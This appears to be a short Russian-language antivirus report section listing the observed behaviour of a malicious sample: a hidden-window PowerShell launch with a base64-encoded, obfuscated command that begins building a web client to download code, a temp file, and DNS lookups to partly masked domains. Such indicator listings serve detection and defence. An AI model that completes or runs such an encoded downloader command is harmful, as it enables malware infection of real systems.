Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAEEAeABVADQAQQBBAEEAPQAoACcAYQBDAFgAUQAnACsAJwBfACcAKwAnAEEAQQAnACkAOwAkAEwAQQBBAEMAUQBBAEQAQQA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1165577.cvr
- DNS ASK va#####otorwerks.com
- DNS ASK va###ronsen.com
- DNS ASK 31###use.com
- DNS ASK li###aenova.org
- DNS ASK lg####.vatelstudents.fr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAEEAeABVADQAQQBBAEEAPQAoACcAYQBDAFgAUQAnACsAJwBfACcAKwAnAEEAQQAnACkAOwAkAEwAQQBBAEMAUQBBAEQAQQA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...' (со скрытым окном)